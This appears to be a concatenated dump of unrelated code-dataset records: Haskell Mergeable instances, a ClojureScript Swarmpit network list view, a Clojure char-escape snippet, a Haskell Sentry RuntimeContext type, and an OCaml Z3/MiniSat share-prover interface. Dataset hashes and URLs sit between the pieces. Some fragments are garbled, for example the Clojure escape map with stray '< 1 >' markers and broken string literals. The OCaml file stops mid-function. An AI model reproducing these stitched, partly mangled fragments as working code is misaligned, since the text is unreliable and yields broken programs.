instance (Mergeable1 m, Mergeable a) => Mergeable (IdentityT m a) where
rootStrategy = wrapStrategy rootStrategy1 IdentityT runIdentityT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (IdentityT m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy m) IdentityT runIdentityT
# INLINE liftRootStrategy #
instance (Mergeable1 m, Mergeable r) => Mergeable (ContT r m a) where
rootStrategy =
wrapStrategy
(liftRootStrategy rootStrategy1)
ContT
(\(ContT v) -> v)
# INLINE rootStrategy #
instance (Mergeable1 m, Mergeable r) => Mergeable1 (ContT r m) where
liftRootStrategy _ =
wrapStrategy
(liftRootStrategy rootStrategy1)
ContT
(\(ContT v) -> v)
# INLINE liftRootStrategy #
RWS
instance
(Mergeable s, Mergeable w, Mergeable a, Mergeable1 m) =>
Mergeable (RWSLazy.RWST r w s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy (liftRootStrategy rootStrategy1)) RWSLazy.RWST (\(RWSLazy.RWST m) -> m)
# INLINE rootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable1 m) =>
Mergeable1 (RWSLazy.RWST r w s m)
where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy (liftRootStrategy3 m rootStrategy rootStrategy))))
RWSLazy.RWST
(\(RWSLazy.RWST rws) -> rws)
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable a, Mergeable1 m) =>
Mergeable (RWSStrict.RWST r w s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy (liftRootStrategy rootStrategy1)) RWSStrict.RWST (\(RWSStrict.RWST m) -> m)
# INLINE rootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable1 m) =>
Mergeable1 (RWSStrict.RWST r w s m)
where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy (liftRootStrategy3 m rootStrategy rootStrategy))))
RWSStrict.RWST
(\(RWSStrict.RWST rws) -> rws)
# INLINE liftRootStrategy #
deriving via
(Default (Monoid.Sum a))
instance
(Mergeable a) => Mergeable (Monoid.Sum a)
deriving via (Default1 Monoid.Sum) instance Mergeable1 Monoid.Sum
#define MERGEABLE_SIMPLE(symtype) \
instance Mergeable symtype where \
rootStrategy = SimpleStrategy ites
#define MERGEABLE_BV(symtype) \
instance (KnownNat n, 1 <= n) => Mergeable (symtype n) where \
rootStrategy = SimpleStrategy ites
#define MERGEABLE_BV_SOME(symtype) \
instance Mergeable symtype where \
rootStrategy = SimpleStrategy ites
#define MERGEABLE_FUN(op) \
instance (SupportedPrim ca, SupportedPrim cb, LinkedRep ca sa, LinkedRep cb sb) => Mergeable (sa op sb) where \
rootStrategy = SimpleStrategy ites
#if 1
MERGEABLE_SIMPLE(SymBool)
MERGEABLE_SIMPLE(SymInteger)
MERGEABLE_BV(SymIntN)
MERGEABLE_BV(SymWordN)
MERGEABLE_BV_SOME(SomeSymIntN)
MERGEABLE_BV_SOME(SomeSymWordN)
MERGEABLE_FUN(=~>)
MERGEABLE_FUN(-~>)
#endif
instance Mergeable ArithException where
rootStrategy =
SortedStrategy
( \case
Overflow -> 0 :: Int
Underflow -> 1 :: Int
LossOfPrecision -> 2 :: Int
DivideByZero -> 3 :: Int
Denormal -> 4 :: Int
RatioZeroDenominator -> 5 :: Int
)
(const $ SimpleStrategy $ \_ l r -> l)
deriving via (Default BitwidthMismatch) instance (Mergeable BitwidthMismatch)
|
ea50f219f940d6a976fb2db2be9e8cf219163ffa2e6dd9f3b8e6c77879192fc3 | docker-in-aws/docker-in-aws | list.cljs | (ns swarmpit.component.network.list
(:require [material.component :as comp]
[material.component.label :as label]
[material.component.panel :as panel]
[material.component.list-table :as list]
[swarmpit.component.mixin :as mixin]
[swarmpit.component.state :as state]
[swarmpit.ajax :as ajax]
[swarmpit.routes :as routes]
[rum.core :as rum]))
(enable-console-print!)
(def headers [{:name "Name"
:width "20%"}
{:name "Driver"
:width "20%"}
{:name "Subnet"
:width "20%"}
{:name "Gateway"
:width "20%"}
{:name ""
:width "20%"}])
(def render-item-keys
[[:networkName] [:driver] [:ipam :subnet] [:ipam :gateway] [:internal]])
(defn- render-item
[item _]
(let [value (val item)]
(case (key item)
:internal (if value
(label/blue "internal"))
value)))
(defn- onclick-handler
[item]
(routes/path-for-frontend :network-info {:id (:networkName item)}))
(defn- networks-handler
[]
(ajax/get
(routes/path-for-backend :networks)
{:state [:loading?]
:on-success (fn [{:keys [response]}]
(state/update-value [:items] response state/form-value-cursor))}))
(defn- init-form-state
[]
(state/set-value {:loading? false
:filter {:query ""}} state/form-state-cursor))
(def mixin-init-form
(mixin/init-form
(fn [_]
(init-form-state)
(networks-handler))))
(rum/defc form < rum/reactive
mixin-init-form
mixin/subscribe-form
mixin/focus-filter [_]
(let [{:keys [items]} (state/react state/form-value-cursor)
{:keys [loading? filter]} (state/react state/form-state-cursor)
filtered-items (list/filter items (:query filter))]
[:div
[:div.form-panel
[:div.form-panel-left
(panel/text-field
{:id "filter"
:hintText "Search networks"
:onChange (fn [_ v]
(state/update-value [:filter :query] v state/form-state-cursor))})]
[:div.form-panel-right
(comp/mui
(comp/raised-button
{:href (routes/path-for-frontend :network-create)
:label "New network"
:primary true}))]]
(list/table headers
(sort-by :networkName filtered-items)
loading?
render-item
render-item-keys
onclick-handler)])) | null | https://raw.githubusercontent.com/docker-in-aws/docker-in-aws/bfc7e82ac82ea158bfb03445da6aec167b1a14a3/ch16/swarmpit/src/cljs/swarmpit/component/network/list.cljs | clojure | (ns swarmpit.component.network.list
(:require [material.component :as comp]
[material.component.label :as label]
[material.component.panel :as panel]
[material.component.list-table :as list]
[swarmpit.component.mixin :as mixin]
[swarmpit.component.state :as state]
[swarmpit.ajax :as ajax]
[swarmpit.routes :as routes]
[rum.core :as rum]))
(enable-console-print!)
(def headers [{:name "Name"
:width "20%"}
{:name "Driver"
:width "20%"}
{:name "Subnet"
:width "20%"}
{:name "Gateway"
:width "20%"}
{:name ""
:width "20%"}])
(def render-item-keys
[[:networkName] [:driver] [:ipam :subnet] [:ipam :gateway] [:internal]])
(defn- render-item
[item _]
(let [value (val item)]
(case (key item)
:internal (if value
(label/blue "internal"))
value)))
(defn- onclick-handler
[item]
(routes/path-for-frontend :network-info {:id (:networkName item)}))
(defn- networks-handler
[]
(ajax/get
(routes/path-for-backend :networks)
{:state [:loading?]
:on-success (fn [{:keys [response]}]
(state/update-value [:items] response state/form-value-cursor))}))
(defn- init-form-state
[]
(state/set-value {:loading? false
:filter {:query ""}} state/form-state-cursor))
(def mixin-init-form
(mixin/init-form
(fn [_]
(init-form-state)
(networks-handler))))
(rum/defc form < rum/reactive
mixin-init-form
mixin/subscribe-form
mixin/focus-filter [_]
(let [{:keys [items]} (state/react state/form-value-cursor)
{:keys [loading? filter]} (state/react state/form-state-cursor)
filtered-items (list/filter items (:query filter))]
[:div
[:div.form-panel
[:div.form-panel-left
(panel/text-field
{:id "filter"
:hintText "Search networks"
:onChange (fn [_ v]
(state/update-value [:filter :query] v state/form-state-cursor))})]
[:div.form-panel-right
(comp/mui
(comp/raised-button
{:href (routes/path-for-frontend :network-create)
:label "New network"
:primary true}))]]
(list/table headers
(sort-by :networkName filtered-items)
loading?
render-item
render-item-keys
onclick-handler)])) | |
b40ef31b5d2179647dded05ad4b48edbc93640672eea666b1fb4a5fd9ea1024a | reborg/clojure-essential-reference | 3.clj | < 1 >
{ \newline " \\n "
\tab " \\t "
\return " \\r "
;; \" "\\\""
;; \\ "\\\\"
;; \formfeed "\\f"
\backspace " \\b " }
< 2 >
(println s)
;; Type backslash-t ' ' followed by backslash-n '
;; '
(println (s/escape s char-escape-string)) ; <3>
;; Type backslash-t '\t' followed by backslash-n '\n' | null | https://raw.githubusercontent.com/reborg/clojure-essential-reference/c37fa19d45dd52b2995a191e3e96f0ebdc3f6d69/OtherFunctions/StringsandRegularExpressions/escape%2Cchar-name-string%2Cchar-escape-string/3.clj | clojure | \" "\\\""
\\ "\\\\"
\formfeed "\\f"
Type backslash-t ' ' followed by backslash-n '
'
<3>
Type backslash-t '\t' followed by backslash-n '\n' | < 1 >
{ \newline " \\n "
\tab " \\t "
\return " \\r "
\backspace " \\b " }
< 2 >
(println s)
|
f896bc60448961b5190f53c6db8a5e27f6fe042fd08b42a74ea28bb9039cfc68 | tfausak/patrol | RuntimeContext.hs | module Patrol.Type.RuntimeContext where
import qualified Data.Aeson as Aeson
import qualified Data.Text as Text
import qualified Patrol.Extra.Aeson as Aeson
-- | <-payloads/types/#runtimecontext>
data RuntimeContext = RuntimeContext
{ build :: Text.Text,
name :: Text.Text,
rawDescription :: Text.Text,
version :: Text.Text
}
deriving (Eq, Show)
instance Aeson.ToJSON RuntimeContext where
toJSON runtimeContext =
Aeson.intoObject
[ Aeson.pair "build" $ build runtimeContext,
Aeson.pair "name" $ name runtimeContext,
Aeson.pair "raw_description" $ rawDescription runtimeContext,
Aeson.pair "version" $ version runtimeContext
]
empty :: RuntimeContext
empty =
RuntimeContext
{ build = Text.empty,
name = Text.empty,
rawDescription = Text.empty,
version = Text.empty
}
| null | https://raw.githubusercontent.com/tfausak/patrol/1cae55b3840b328cda7de85ea424333fcab434cb/source/library/Patrol/Type/RuntimeContext.hs | haskell | | <-payloads/types/#runtimecontext> | module Patrol.Type.RuntimeContext where
import qualified Data.Aeson as Aeson
import qualified Data.Text as Text
import qualified Patrol.Extra.Aeson as Aeson
data RuntimeContext = RuntimeContext
{ build :: Text.Text,
name :: Text.Text,
rawDescription :: Text.Text,
version :: Text.Text
}
deriving (Eq, Show)
instance Aeson.ToJSON RuntimeContext where
toJSON runtimeContext =
Aeson.intoObject
[ Aeson.pair "build" $ build runtimeContext,
Aeson.pair "name" $ name runtimeContext,
Aeson.pair "raw_description" $ rawDescription runtimeContext,
Aeson.pair "version" $ version runtimeContext
]
empty :: RuntimeContext
empty =
RuntimeContext
{ build = Text.empty,
name = Text.empty,
rawDescription = Text.empty,
version = Text.empty
}
|
d9ada2e0b839b51eb9b5ea79b5ea749acd2f4ab7cb190c0693e2fac9b5953151 | hipsleek/hipsleek | shares_z3_lib.ml | #include "xdebug.cppo"
open Share_prover
module PrvComms =
struct
type proc = {name:string; pid: int; inchannel: in_channel; outchannel: out_channel; errchannel: in_channel }
exception Timeout
external set_close_on_exec : Unix.file_descr -> unit = "unix_set_close_on_exec";;
let try_set_close_on_exec fd =
try set_close_on_exec fd; true with Invalid_argument _ -> false
let open_proc_full cmd args input output error toclose =
let cloexec = List.for_all try_set_close_on_exec toclose in
match Unix.fork() with
0 -> Unix.dup2 input Unix.stdin; Unix.close input;
Unix.dup2 output Unix.stdout; Unix.close output;
Unix.dup2 error Unix.stderr; Unix.close error;
if not cloexec then List.iter Unix.close toclose;
begin try Unix.execvp cmd args
with _ -> exit 127
end
| id -> id
let open_process_full cmd args =
let (in_read, in_write) = Unix.pipe() in
let (out_read, out_write) = Unix.pipe() in
let (err_read, err_write) = Unix.pipe() in
let inchan = Unix.in_channel_of_descr in_read in
let outchan = Unix.out_channel_of_descr out_write in
let errchan = Unix.in_channel_of_descr err_read in
let id = open_proc_full cmd args out_read in_write err_write [in_read; out_write; err_read] in
Unix.close out_read;
Unix.close in_write;
Unix.close err_write;
(inchan, outchan, errchan, id)
let open_proc cmd args out_file:int =
match Unix.fork() with
| 0 -> begin
let output = Unix.openfile out_file [Unix.O_CREAT;Unix.O_WRONLY] 0o640 in
Unix.dup2 output Unix.stdout; Unix.close output;
try Unix.execvp cmd args with _ -> exit 127 end
| id -> id
let sigalrm_handler = Sys.Signal_handle (fun _ -> raise Timeout)
let set_timer tsecs = ignore (Unix.setitimer Unix.ITIMER_REAL { Unix.it_interval = 0.0; Unix.it_value = tsecs })
(* same as maybe_raise_timoeut just that it treats the timeout exception with the with_timeout function *)
let maybe_raise_and_catch_timeout (fnc: 'a -> 'b) (arg: 'a) (tsec: float) (with_timeout: unit -> 'b): 'b =
try
let old_handler = Sys.signal Sys.sigalrm sigalrm_handler in
let reset_sigalrm () = Sys.set_signal Sys.sigalrm old_handler in
let () = set_timer tsec in
let answ = fnc arg in
set_timer 0.0;
reset_sigalrm ();
answ
with
| Timeout ->
Printf.eprintf " maybe_raise_and_catch_timeout : UNEXPECTED Timeout after %s secs" (string_of_float tsec);
(with_timeout ())
| exc -> begin
Printf.eprintf " maybe_raise_and_catch_timeout : Unexpected exception : %s" (Printexc.to_string exc);
raise exc
end
(* closes the pipes of the named process *)
let close_pipes (process: proc) : unit =
(try
flush process.outchannel;
Unix.close (Unix.descr_of_out_channel process.outchannel);
Unix.close (Unix.descr_of_in_channel process.errchannel)
with | e -> () );
(try
Unix.close (Unix.descr_of_in_channel process.inchannel)
with | e -> () )
let start (prover: string * string * string array) set_process =
let (prover_name, prover_proc, prover_arg_array) = prover in
try
let inchn, outchn, errchn, npid = open_process_full prover_proc prover_arg_array in
let process = {name = prover_name; pid = npid; inchannel = inchn; outchannel = outchn; errchannel = errchn} in
set_process process
with
| e -> begin
let () = print_string ("\n["^prover_name^".ml ]Unexpected exception while starting prover "^ prover_name ^ "\n") in
flush stdout; flush stderr;
raise e
end
let stop (process:proc) (invocations: int) (killing_signal: int) =
close_pipes process;
try
Unix.kill process.pid killing_signal;
ignore (Unix.waitpid [] process.pid)
with
| e -> ()
let restart start stop = stop (); start ()
(* to delete *)
module Ss_Z3 : SAT_SLV = functor ( Sv : SV ) - >
(* struct *)
type t_var = Sv.t
(* type nz_cons = t_var list list *)
type p_var = ( \*include Gen. EQ_TYPE with type t = v*\ )
| PVar of t_var
(* | C_top *)
(* type eq_syst = (t_var*t_var*p_var) list *)
(* let stringofTvar = Sv.string_of *)
let stringofPvar v = match v with | C_top - > " T " | PVar v - > Sv.string_of v
(* let mkTop () = C_top *)
let mkVar v = PVar v
let v = match v with | C_top - > None | PVar v - > Some v
let string_of_eq ( v1,v2,v3 ) = ( Sv.string_of v1)^ " * " ^(Sv.string_of v2)^ " = " ^(match v3 with | PVar v3 - > Sv.string_of v3 | _ - > " true " )
let string_of_eq_l l = String.concat " \n " ( List.map string_of_eq l )
(* (\**********Z3 interface **********\) *)
(* (\** Create a boolean variable using the given name. *\) *)
let mk_bool_var ctx name = Z3.mk_const ctx ( ctx name ) ( Z3.mk_bool_sort ctx )
(* let mk_sv_bool_var ctx sv = mk_bool_var ctx (Sv.get_name sv) *)
(* (\** Create a logical context. Enable model construction. Also enable tracing to stderr. *\) *)
(* let mk_context ()= *)
(* let cfg = Z3.mk_config () in *)
Z3.set_param_value cfg " MODEL " " false " ;
let ctx = in
(* Z3.trace_to_stderr ctx; *)
(* ctx *)
( \ * * Check if ctx is sat . if sat , then could get the )
(* let check ctx =(match Z3.check ctx with *)
(* | Z3.L_FALSE -> false *)
| Z3.L_UNDEF - > print_string " unknown\n " ; failwith " unknown sat "
(* | Z3.L_TRUE -> true ) *)
(* let add_eqs ctx = *)
(* List.iter (fun (v1,v2,v3)-> *)
(* let bv1 = mk_sv_bool_var ctx v1 in *)
let bv2 = mk_sv_bool_var ctx v2 in
let xor12 = Z3.mk_xor ctx bv1 bv2 in
(* match v3 with *)
| PVar v3- >
( Z3.assert_cnstr ctx ( Z3.mk_not ctx ( Z3.mk_and ctx [ |bv1;bv2| ] ) ) ;
ctx ( Z3.mk_eq ctx xor12 ( mk_sv_bool_var ctx v3 ) ) )
(* | C_top -> Z3.assert_cnstr ctx xor12 *)
(* ) *)
let add_one_nz ctx l= Z3.assert_cnstr ctx ( Z3.mk_or ctx ( Array.of_list ( List.map ( mk_sv_bool_var ctx ) l ) ) )
(* let add_nz ctx = List.iter (add_one_nz ctx) *)
(* let check_sat_nz ctx non_zeros = *)
(* Z3.push ctx; *)
add_nz ;
if check ctx then ( Z3.pop ctx 1;true )
(* else *)
( Z3.pop ctx 1 ;
(* List.for_all (fun l -> *)
(* Z3.push ctx; *)
(* add_one_nz ctx l; *)
(* let r= check ctx in *)
(* Z3.pop ctx 1; *)
(* r) non_zeros ) *)
let call_sat non_zeros eqs =
(* let ctx = mk_context () in *)
add_eqs ctx eqs ;
(* let r = check_sat_nz ctx non_zeros in *)
Z3.del_context ; r
let call_sat non_zeros eqs =
let nzs = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) non_zeros ) in
let = string_of_eq_l eqs in
print_string ( " Z3 SAT : " ^nzs^"\n"^eqss^"\n " ) ;
let r = call_sat non_zeros eqs in
(* print_string ("r: "^(string_of_bool r)^"\n"); r *)
let call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons =
(* let ctx = mk_context () in *)
(* add_eqs ctx a_l_eqs; *)
(* print_string "added eqs\n";flush_all (); *)
(* if not (check_sat_nz ctx a_nz_cons) then (Z3.del_context ctx;true) *)
(* else *)
let = Hashtbl.create 20 in
let bool_sort = Z3.mk_bool_sort ctx in
let ( ) = List.fold_left ( fun c v- > Hashtbl.add tbl ( Sv.get_name v ) ( Z3.mk_bound ctx c bool_sort ) ; c+1 ) 1 c_ev in
(* print_string "added exists\n";flush_all (); *)
let v =
let in
(* try *)
(* Hashtbl.find tbl nm *)
(* with Not_found -> mk_bool_var ctx nm in *)
(* let conseq = *)
let f_ccv = List.fold_left ( fun a ( v , c)- >
(* let z3v = mk_sv_bool_var_ex v in *)
let z3v = if c then z3v else Z3.mk_not ctx z3v in
(* Z3.mk_and ctx [| a ; z3v|] *)
(* ) (Z3.mk_true ctx) c_const_vars in *)
(* let f_sv = List.fold_left (fun a (v1,v2)-> *)
(* let z3v1 = mk_sv_bool_var_ex v1 in *)
let z3v2 = in
(* let z3eq = Z3.mk_eq ctx z3v1 z3v2 in *)
Z3.mk_and ctx [ |a ; z3eq| ]
(* ) f_ccv c_subst_vars in *)
(* let f_nz = List.fold_left (fun a l -> *)
let nz_arr = Array.of_list ( List.map mk_sv_bool_var_ex l ) in
(* Z3.mk_and ctx [|a;Z3.mk_or ctx nz_arr|] *)
(* ) f_sv c_nz_cons in *)
(* let f_eqs = List.fold_left (fun a (v1,v2,v3)-> *)
(* let z3v1 = mk_sv_bool_var_ex v1 in *)
let z3v2 = in
let xor12 = Z3.mk_xor ctx z3v1 z3v2 in
(* let f1 = Z3.mk_not ctx (Z3.mk_and ctx [|z3v1;z3v2|]) in *)
(* let a = Z3.mk_and ctx [|a;f1|] in *)
(* match v3 with *)
| PVar v3 - > Z3.mk_and ctx [ | a ; Z3.mk_eq ctx xor12 ( mk_sv_bool_var_ex v3 ) | ]
(* | C_top -> Z3.mk_and ctx [| a; xor12 |] *)
(* ) f_nz c_l_eqs in *)
let l = c_ev in
(* let types = Array.init l (fun _ -> bool_sort) in *)
(* let names = Array.init l (Z3.mk_int_symbol ctx) in *)
(* Z3.mk_forall ctx 0 [||] types names f_eqs in *)
(* print_string "constructed conseq\n";flush_all (); *)
Z3.assert_cnstr ctx ( Z3.mk_not ) ;
(* print_string "added conseq\n";flush_all (); *)
(* let r = Z3.check ctx in *)
(* print_string "actuall check\n";flush_all (); *)
(* Z3.del_context ctx; *)
(* match r with *)
(* | Z3.L_FALSE -> true *)
(* | Z3.L_UNDEF -> print_string "unknown\n"; false *)
(* | Z3.L_TRUE -> false *)
let call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons =
(* let nzs = *)
(* String.concat "," ( *)
List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) a_nz_cons ) in
let eqss = string_of_eq_l a_l_eqs in
print_string ( " \n Imply : " ^nzs^"\n"^eqss^"\n");flush_all ( ) ;
let r = call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons c_l_eqs c_const_vars c_subst_vars in
(* print_string ("r: "^(string_of_bool r)); r *)
(* end;; *)
(* to delete *)
(************************************************************************************)
module Ss_Z3_proc:SAT_SLV = functor (Sv:SV) ->
struct
type t_var = Sv.t
type nz_cons = t_var list list
include Gen. EQ_TYPE with type t = v
| PVar of t_var
| C_top
type eq_syst = (t_var*t_var*p_var) list
let stringofTvar = Sv.string_of
let stringofPvar v = match v with | C_top -> "T" | PVar v -> Sv.string_of v
let mkTop () = C_top
let mkVar v = PVar v
let getVar v = match v with | C_top -> None | PVar v -> Some v
let string_of_eq (v1,v2,v3) = (Sv.string_of v1)^" * "^(Sv.string_of v2)^" = "^(match v3 with | PVar v3 -> Sv.string_of v3 | _ -> " true")
let string_of_eq_l l = String.concat "\n" (List.map string_of_eq l)
(**********Z3 interface **********)
(**********Z3 interface **********)
(**********Z3 interface **********)
(**********Z3 interface **********)
let smt_of_acons (v,c) = if c then Sv.string_of v else "(not " ^(Sv.string_of v) ^" )"
let smt_of_asub (v1,v2) = "(= " ^(Sv.string_of v1) ^ " " ^ (Sv.string_of v2) ^ ")"
let smt_of_eq (v1,v2,v3) =
" (= " ^ " ( and " ^(Sv.string_of v1)^ " " ^ ( Sv.string_of v2)^ " ) " ^ " " ^ ( match v3 with PVar v- > Sv.string_of v | _ - > " 1 " ) ^ " ) "
let xor12 = "(xor " ^(Sv.string_of v1)^ " " ^ (Sv.string_of v2)^")" in
match v3 with
| PVar v3->
let eq = "(= " ^ xor12 ^ " " ^ (Sv.string_of v3) ^ ")" in
let neq = "(not (and " ^ (Sv.string_of v1)^ " " ^ (Sv.string_of v2) ^ " ) )" in
"(and " ^ eq^ " " ^ neq ^ " )"
| C_top -> xor12
let smt_of_anz nz = match nz with
| [] -> failwith "error, unexpected empty nz"
| h::t -> List.fold_left (fun a c-> "(or " ^ a ^ " " ^ (Sv.string_of c) ^ ")") (Sv.string_of h) t
let smt_of_ante (_,anz,asub,acons,aeq) =
let acons = List.map (fun c-> "(assert " ^ (smt_of_acons c) ^ ")\n") acons in
let asub = List.map (fun c-> "(assert " ^ (smt_of_asub c) ^ ")\n") asub in
let aeq = List.map (fun c-> "(assert " ^ (smt_of_eq c) ^ ")\n") aeq in
let anz = List.map (fun c-> "(assert " ^ (smt_of_anz c) ^ ")\n") anz in
String.concat "" (acons@asub@aeq@anz)
let smt_of_conseq (cex,cnz,csub,ccons,ceq) =
let ccons = List.map smt_of_acons ccons in
let csub = List.map smt_of_asub csub in
let ceq = List.map smt_of_eq ceq in
let cnz = List.map smt_of_anz cnz in
let s = List.fold_left (fun a c-> "(and " ^ a ^ " " ^ c ^ ")") "true" (ccons@csub@ceq@cnz) in
List.fold_left (fun a c -> "(exists ((" ^ (Sv.string_of c) ^ " Bool)) " ^ a ^ ")") s cex
(***************************************************************
INTERATION
**************************************************************)
type sat_type =
| Sat (* solver returns sat *)
| UnSat (* solver returns unsat *)
| Unknown (* solver returns unknown or there is an exception *)
| Aborted (* solver returns an exception *)
Collect all Z3 's output into a list of strings
let rec icollect_output chn accumulated_output : string list =
let output = try
let line = input_line chn in
if ((String.length line) > 7) then (*something diff to sat/unsat/unknown, retry-may lead to timeout here*)
icollect_output chn (accumulated_output @ [line])
else accumulated_output @ [line]
with
| End_of_file -> accumulated_output in
output
let sat_type_from_string r input=
if (r = "sat") then Sat
else if (r = "unsat") then UnSat
else
try
let (todo_unk:int) = Str.search_forward (Str.regexp "unexpected") r 0 in
(print_string "Z3 translation failure!"; failwith ("Z3 translation failure!!\n"^r^"\n input: "^input))
with
| Not_found -> Unknown
let iget_answer chn input=
let output = icollect_output chn [] in
sat_type_from_string (List.nth output (List.length output - 1)) input
let remove_file filename = try Sys.remove filename with | e -> ()
(* Global settings *)
let prover_process = ref {
PrvComms.name = "z3";
PrvComms.pid = 0;
PrvComms.inchannel = stdin;
PrvComms.outchannel = stdout;
PrvComms.errchannel = stdin
}
let smtsolver_name = ref ("z3": string)
let z3_call_count: int ref = ref 0
let is_z3_running = ref false
(***********)
let test_number = ref 0
let last_test_number = ref 0
let z3_restart_interval = ref (-1)
let path_to_z3 = "z3" (*"z3"*)
let smtsolver_name = ref ("z3": string)
(* start z3 system in a separated process and load redlog package *)
and start() =
if not !is_z3_running then begin
print_string "Starting z3... \n"; flush stdout;
last_test_number := !test_number;
PrvComms.start (!smtsolver_name, !smtsolver_name, [|!smtsolver_name;"-smt2"; "-si"|]) (fun proc -> prover_process := proc);
is_z3_running := true;
end
stop Z3 system
let stop () =
if !is_z3_running then begin
let num_tasks = !test_number - !last_test_number in
print_string ("Stop z3... "^(string_of_int !z3_call_count)^" invocations "); flush stdout;
let () = PrvComms.stop !prover_process num_tasks Sys.sigkill in
is_z3_running := false;
end
restart Z3 system
let restart reason =
if !is_z3_running then
let () = print_string (reason^" Restarting z3 after ... "^(string_of_int !z3_call_count)^" invocations ") in
PrvComms.restart start stop
else print_string (reason^" not restarting z3 ... "^(string_of_int !z3_call_count)^" invocations ")
(* send formula to z3 and receive result -true/false/unknown*)
let check_formula f timeout =
begin
if not !is_z3_running then start ()
else if (!z3_call_count = !z3_restart_interval) then
begin
restart("Regularly restart:1 ");
z3_call_count := 0;
end;
let fnc f =
incr z3_call_count;
output_string (!prover_process.PrvComms.outchannel) ("(push)\n" ^ f ^ "(pop)\n");
flush (!prover_process.PrvComms.outchannel);
iget_answer (!prover_process.PrvComms.inchannel) f
in
let fail_with_timeout () = restart ("[z3.ml]Timeout when checking sat!" ^ (string_of_float timeout)); Unknown in
PrvComms.maybe_raise_and_catch_timeout fnc f timeout fail_with_timeout
end
let rec rem_dups l = match l with [] -> [] | q::qs -> if (List.exists (Sv.eq q) qs) then rem_dups qs else q::(rem_dups qs)
let fv (exv,nz,subs,cons,eqs)=
let w1,w2 = List.split subs in
let fv_eq (v1,v2,v3)= v1::v2::(match v3 with C_top -> [] | PVar v-> [v]) in
exv@(List.concat nz)@(fst (List.split cons))@w1@w2@(List.concat (List.map fv_eq eqs))
let to_smt ante conseq : string =
let conseq1 = match conseq with
| None -> ([],[],[],[],[])
| Some f -> f in
let all_fv = rem_dups (fv ante @ fv conseq1) in
let smt_var_decls = String.concat "" (List.map (fun v -> "(declare-fun " ^ (Sv.string_of v) ^ " () Bool)\n" ) all_fv) in
let ante_str = smt_of_ante ante in
let conseq_str = if conseq=None then "false" else smt_of_conseq conseq1 in
( ";Variables declarations\n" ^smt_var_decls ^ ";Antecedent\n" ^ ante_str ^ ";Negation of Consequence\n" ^ "(assert (not " ^ conseq_str ^ "))\n" ^ "(check-sat)")
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst) (c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst)
(c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
let input = to_smt (a_ev, a_nz_cons, [],[],a_l_eqs) (Some (c_ev, c_nz_cons, c_subst_vars, c_const_vars, c_l_eqs)) in
( " \n \n z3 input : " ^(input)^"\n " ) ;
match check_formula input 0. with
| Sat -> false
| UnSat -> true
| Unknown -> false
| Aborted -> false
let call_sat non_zeros eqs =
match (check_formula (to_smt ([],non_zeros,[],[],eqs) None)) 10.0 with
| UnSat -> false
| _ -> true
let call_sat non_zeros eqs =
let nzs = String.concat "," (List.map (fun l-> "{"^(String.concat "," (List.map Sv.string_of l))^"}") non_zeros) in
let eqss = string_of_eq_l eqs in
( " Z3 SAT : " ^nzs^"\n"^eqss^"\n " ) ;
let r = call_sat non_zeros eqs in
( " r : " ^(string_of_bool r)^"\n " ) ;
end;;
(************************************************************************************)
module Ss_minisat_proc:SAT_SLV = functor (Sv:SV) ->
struct
type t_var = Sv.t
type nz_cons = t_var list list
include Gen. EQ_TYPE with type t = v
| PVar of t_var
| C_top
type eq_syst = (t_var*t_var*p_var) list
let stringofTvar = Sv.string_of
let stringofPvar v = match v with | C_top -> "T" | PVar v -> Sv.string_of v
let mkTop () = C_top
let mkVar v = PVar v
let getVar v = match v with | C_top -> None | PVar v -> Some v
let string_of_eq (v1,v2,v3) = (Sv.string_of v1)^" * "^(Sv.string_of v2)^" = "^(match v3 with | PVar v3 -> Sv.string_of v3 | _ -> " true")
let string_of_eq_l l = String.concat "\n" (List.map string_of_eq l)
(**********minisat interface **********)
(* Global settings *)
let minisat_timeout_limit = 15.0
let test_number = ref 0
let last_test_number = ref 0
let minisat_restart_interval = ref (-1)
let log_all_flag = ref false
let is_minisat_running = ref false
default timeout is 15 seconds
let minisat_call_count: int ref = ref 0
let log_file = open_out ("allinput.minisat")
valid value is : " file " or " stdin "
(*minisat*)
let minisat_path = "/usr/local/bin/minisat"
let minisat_name = "minisat"
let minisat_arg = "-pre"
let minisat_input_format = "cnf" (* valid value is: cnf *)
let number_clauses = ref 1
let number_var = ref 0
let minisat_process = ref { PrvComms.name = "minisat";
PrvComms.pid = 0;
PrvComms.inchannel = stdin;
PrvComms.outchannel = stdout;
PrvComms.errchannel = stdin
}
(***************************************************************
INTERACTION
**************************************************************)
let rec collect_output (chn: in_channel) : (string * bool) =
try
let line = input_line chn in
if line = "SATISFIABLE" then
(line, true)
else
collect_output chn
with
| End_of_file -> ("", false)
let get_prover_result (output : string) :bool =
let validity =
if (output="SATISFIABLE") then
true
else
false in
validity
(* output: - prover_output - the running status of prover: true if running, otherwise false *)
let get_answer (chn: in_channel) : (bool * bool)=
let (output, running_state) = collect_output chn in
let
validity_result = get_prover_result output;
in
(validity_result, running_state)
let remove_file filename =
try Sys.remove filename;
with e -> ignore e
let set_process proc =
minisat_process := proc
let start () =
if not !is_minisat_running then (
print_endline_quiet ("Starting Minisat... \n");
last_test_number := !test_number;
if (minisat_input_format = "cnf") then (
PrvComms.start (minisat_name, minisat_path, [|minisat_arg|]) set_process;
is_minisat_running := true;
)
)
(* stop minisat system *)
let stop () =
if !is_minisat_running then (
let num_tasks = !test_number - !last_test_number in
print_string ("\nStop Minisat... " ^ (string_of_int !minisat_call_count) ^ " invocations "); flush stdout;
